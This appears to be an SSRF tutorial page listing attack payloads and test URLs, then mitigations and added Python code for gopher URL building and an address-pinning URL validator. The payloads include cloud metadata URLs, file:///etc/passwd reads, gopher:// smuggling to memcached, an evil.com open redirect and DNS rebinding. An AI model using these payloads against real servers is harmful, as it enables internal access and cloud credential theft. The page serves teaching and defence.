SSRF

Description: Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker makes the server issue requests to destinations of the attacker's choosing, so the request originates from the server's network position and identity. This can expose internal services that are not reachable from the Internet, cloud instance metadata and the credentials it holds, and lets the attacker enumerate internal hosts and ports.

Example with Scenario: Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL, and the address it resolves to, properly, an attacker can provide a URL pointing to an internal service, such as http://localhost/admin, and read the response of an internal resource through the thumbnail feature.

Payloads:

  1. Access Internal Services:

    http://localhost/admin
    http://127.0.0.1/admin
    http://internal-service.local/admin
  2. Access Metadata Services (cloud environments):

    http://169.254.169.254/latest/meta-data/
    http://169.254.169.254/computeMetadata/v1/
    The first path is the AWS EC2 endpoint (IMDSv1; where IMDSv2 is enforced, a session token obtained with a PUT request is required, which a GET-only SSRF cannot supply). The second is Google Cloud, which only answers requests carrying the header Metadata-Flavor: Google, so it is reachable only when the SSRF lets you control request headers.
  3. Open Redirect on an allow-listed host:

    http://example.com/?url=http://evil.com
    If example.com is on the allow-list but its url parameter redirects, a fetcher that follows redirects ends up at the attacker's target, which can just as well be an internal address: the allow-list is usually checked only against the first URL.
  4. Local File Read via the file:// scheme:

    file:///etc/passwd
    file:///C:/Windows/System32/drivers/etc/hosts
    Works only when the fetch library supports file:// (libcurl does unless the allowed protocols are restricted); the response then contains the file contents instead of a web page.
  5. Protocol Smuggling:

    gopher://localhost:11211/_stats
    ftp://ftp.example.com/file.txt
    gopher sends the selector (everything after the leading "/_") as raw bytes to any TCP port, so line-based plain-text services such as memcached on 11211 can be driven with the fetcher as a relay; here it issues the read-only stats command. The ftp:// line checks whether schemes other than HTTP(S) are accepted at all.
  6. DNS Rebinding:

    http://malicious.com (an attacker-controlled name with a very short TTL that resolves to a public address when the application validates the host, and to an internal address such as 127.0.0.1 when the HTTP client resolves it again to connect)
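The gopher payload above depends on the selector reaching the target socket byte for byte. The following is an added example, not code from the original page, showing how to build such a URL with explicit line endings and how to decode what a client will send for it; gopher_url and gopher_payload are illustrative helper names, not a library API.

```python
# Added example (not from the original page): build a gopher:// URL whose
# selector carries raw protocol bytes, and decode what a client sends for it.
# gopher_url and gopher_payload are illustrative helpers, not a library API.
from urllib.parse import quote, unquote_to_bytes, urlsplit


def gopher_url(host, port, raw):
    """Wrap `raw` (bytes or str) so that a gopher client sends it verbatim.

    In gopher://host:port/<type><selector> the single <type> character
    (conventionally "_") is consumed by the client; only <selector> reaches
    the socket. CR/LF and other non-printable bytes are percent-encoded so
    they survive URL parsing on the way to the fetcher.
    """
    if isinstance(raw, str):
        raw = raw.encode()
    return f"gopher://{host}:{port}/_{quote(raw, safe='')}"


def gopher_payload(url):
    """Return the bytes a gopher client writes to the socket for `url`,
    before any terminating CRLF the client may append on its own."""
    path = urlsplit(url).path
    if len(path) < 2:                    # "" or "/" means an empty selector
        return b""
    return unquote_to_bytes(path[2:])    # drop "/" and the type character


if __name__ == "__main__":
    # memcached speaks a line-based text protocol on 11211. Each command is
    # terminated explicitly so the result does not depend on whether the
    # client appends its own CRLF (curl does; other fetchers may not).
    url = gopher_url("localhost", 11211, "stats\r\nquit\r\n")
    print(url)                  # gopher://localhost:11211/_stats%0D%0Aquit%0D%0A
    print(gopher_payload(url))  # b'stats\r\nquit\r\n'
```

The page's bare `_stats` selector works with curl only because curl appends a CRLF after the selector; encoding the line endings yourself, as above, makes the payload independent of the client behind the SSRF.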

Test Cases:

  1. Basic Internal Access:

    http://localhost:80
    http://127.0.0.1:8080
  2. Private IP Ranges:

    http://192.168.1.1:80
    http://10.0.0.1:8080
  3. Accessing Metadata Services:

    http://169.254.169.254/latest/meta-data/
  4. File Access:

    file:///etc/passwd
    file:///C:/Windows/System32/drivers/etc/hosts
  5. Alternative Protocols:

    ftp://example.com/file.txt
    gopher://localhost:11211/_stats
  6. Custom Headers:

    curl http://example.com -H 'Host: internal-service.local'
    Meaningful when the SSRF sink forwards caller-supplied headers, or when a reverse proxy in front of the allowed host routes on the Host header: the TCP connection goes to an allowed address, but the request is served by an internal virtual host.

Mitigation:

  1. Input Validation and Allow-listing:

    • Validate user-supplied URLs against a strict allow-list of schemes, hosts and ports, and check the address each host resolves to rather than only its name: reject loopback, RFC 1918, link-local (including 169.254.169.254) and their IPv6 equivalents. Apply the same check to every redirect target, or do not follow redirects at all.

  2. Disable Unnecessary Protocols:

    • Restrict the application from using protocols other than HTTP/HTTPS.

  3. Network Segmentation:

    • Run the fetching component in a network segment with egress filtering so that, even if validation fails, it cannot reach internal services or sensitive resources directly.

  4. Metadata Service Protection:

    • In cloud environments, make the metadata endpoint unusable from a plain GET: on AWS enforce IMDSv2 (session token required, hop limit 1), and block 169.254.169.254 outright for workloads that do not need it. Keep instance roles least-privilege so that credentials obtained through SSRF are of limited use.

  5. Use a URL Parsing Library:

    • Parse the URL with a robust library and make every decision on the parsed, normalized components (scheme, host, port, resolved address) rather than on the raw string, so that encoding tricks, embedded credentials (http://allowed@internal/) and alternative IP notations do not bypass the check. Connect to the address that was validated instead of resolving the name a second time; this closes the DNS rebinding window.

  6. Timeouts and Retries:

    • Set short timeouts and limit retries on server-side requests so the endpoint cannot be used as a long-lived proxy, or as a port scanner that infers open ports from response timing.

  7. Monitor and Alert:

    • Log outbound requests made on behalf of users and alert on unusual patterns, in particular requests to loopback, link-local or private address ranges and to the metadata endpoint.
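Mitigations 1, 2 and 5 above, and the DNS rebinding payload, come together in the following added example; it is not code from the original page. It is a Python allow-list guard that validates the scheme, port and every resolved address, and then pins the validated address for the connection so no second lookup happens. validate_url, build_pinned_request, the constructed resolver table (names such as good.example and metadata.internal) and rebinding_resolver are illustrative assumptions; the test-case URLs from the page are the intended inputs.

```python
# Added example (not from the original page): an allow-list guard for a
# server-side fetcher that pins the resolved address, so a second DNS lookup
# (rebinding) cannot swap in an internal host. validate_url, build_pinned_request,
# CONSTRUCTED_TABLE and rebinding_resolver are illustrative assumptions, not a
# real library API.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# Never reachable from user input: "this host", loopback, RFC 1918, CGNAT,
# link-local (169.254.169.254 is here), IPv6 loopback/ULA/link-local, and the
# IPv4-mapped and NAT64 prefixes that can wrap any of the above.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128", "fc00::/7",
    "fe80::/10", "::ffff:0:0/96", "64:ff9b::/96")]


class SSRFBlocked(ValueError):
    """Raised for any URL the server must not fetch."""


def default_resolver(host):
    """All addresses (v4 and v6) the name resolves to right now."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_public(ip):
    mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:a.b.c.d -> a.b.c.d
    if mapped is not None:
        ip = mapped
    if ip.is_multicast or ip.is_reserved or ip.is_unspecified:
        return False
    return not any(ip in net for net in BLOCKED_NETWORKS)


def validate_url(url, resolver=default_resolver):
    """Allow-list scheme, host and port, then check every address the host
    resolves to. Returns (parsed_url, port, first_public_ip)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise SSRFBlocked(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise SSRFBlocked("userinfo not allowed")  # http://allowed@internal/
    host = parts.hostname
    if not host:
        raise SSRFBlocked("missing host")
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError as exc:
        raise SSRFBlocked("malformed port") from exc
    if port not in ALLOWED_PORTS:
        raise SSRFBlocked(f"port not allowed: {port}")
    try:
        ipaddress.ip_address(host)
        addrs = [host]           # IP literal, DNS not involved
    except ValueError:
        addrs = resolver(host)   # names, and forms such as 2130706433
    if not addrs:
        raise SSRFBlocked(f"unresolvable host: {host!r}")
    ips = [ipaddress.ip_address(a) for a in addrs]
    for ip in ips:               # one non-public record is enough to refuse
        if not _is_public(ip):
            raise SSRFBlocked(f"{host!r} resolves to non-public {ip}")
    return parts, port, ips[0]


def is_allowed(url, resolver=default_resolver):
    try:
        validate_url(url, resolver)
        return True
    except SSRFBlocked:
        return False


def naive_connect_ip(url, resolver=default_resolver):
    """Vulnerable 'before' pattern: validate by name, then hand the name to the
    HTTP client, which resolves it again on connect. Returns that address."""
    validate_url(url, resolver)
    return resolver(urlsplit(url).hostname)[0]


def build_pinned_request(url, resolver=default_resolver):
    """Hardened pattern: connect to the address that passed validation and carry
    the name only in the Host header (and TLS SNI), so there is no second
    lookup. Returns (connect_ip, port, path, host_header)."""
    parts, port, ip = validate_url(url, resolver)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    return str(ip), port, path, parts.hostname


# Constructed DNS data so the example runs offline and deterministically;
# 203.0.113.0/24 is the TEST-NET-3 documentation range.
CONSTRUCTED_TABLE = {
    "good.example": ["203.0.113.10"],
    "metadata.internal": ["169.254.169.254"],
    "dual.example": ["203.0.113.10", "10.0.0.5"],  # one public, one private
    "2130706433": ["127.0.0.1"],  # decimal 127.0.0.1, as inet_aton parses it
}


def table_resolver(host):
    return CONSTRUCTED_TABLE.get(host, [])


def rebinding_resolver():
    """Constructed attacker DNS with a zero-TTL record: the first lookup
    answers with a public address, every later one with loopback."""
    first = iter(["203.0.113.10"])
    return lambda host: [next(first, "127.0.0.1")]
```

With the default resolver, is_allowed(url) performs a real DNS lookup; the constructed table_resolver keeps the example offline. Whatever HTTP client does the fetch must be told to connect to the pinned address while keeping the original Host header and SNI; for clients that insist on resolving names themselves, a custom resolver hook or a forward proxy that applies the same check is the alternative. naive_connect_ip shows why: it validates the name once and then lets a second lookup pick the destination, which is exactly the window rebinding exploits.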
